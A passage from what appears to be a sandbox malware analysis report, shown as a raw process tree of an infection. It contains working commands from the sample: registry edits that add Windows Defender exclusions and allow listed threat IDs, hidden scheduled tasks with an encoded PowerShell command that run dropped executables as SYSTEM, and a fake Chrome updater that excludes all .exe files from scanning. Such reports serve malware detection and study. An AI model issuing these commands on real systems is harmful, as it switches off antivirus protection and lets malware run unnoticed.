(x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:6680
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7884
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:8036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8156
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:7740
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6836
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:7004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5284
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5248
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5620
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:7188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7416
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8156
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4452
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gyZuQRAfp" /SC once /ST 12:01:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:7680
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gyZuQRAfp"
  2⤵
  PID:7584
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gyZuQRAfp"
  2⤵
  PID:7184
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 12:24:26 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\aJKkcAi.exe\" GH /aacydidwf 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:7064
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:7548

C:\Users\Admin\AppData\Local\Temp\7zSF090.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSF090.tmp\Install.exe it /rAjdidZQtj 385118 /S
1⤵
PID:2392
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:6344
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:6420
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:6484
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:6500
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:6616
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:6680
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:6692
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:6748
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:6800
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:6812
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:6992
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:7012
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:7024
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:6508
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:6648
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6860
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:6588
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:7164
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6020
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:7244
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6408
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5780
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6832
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4580
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5276
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:200
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7196
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5740
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5784
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7416
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7968
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7196
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6400
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6008
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 12:28:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\GuodtKN.exe\" GH /UoksdidCf 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:6140
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XyyyteIMwZeutaZuw"
  2⤵
  PID:7756

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
1⤵
PID:6664

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
PID:6704

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
1⤵
PID:5412

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:5392

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6184

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:3484

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
PID:7064
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5724

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5052

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8060

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7568

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:7656

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7828

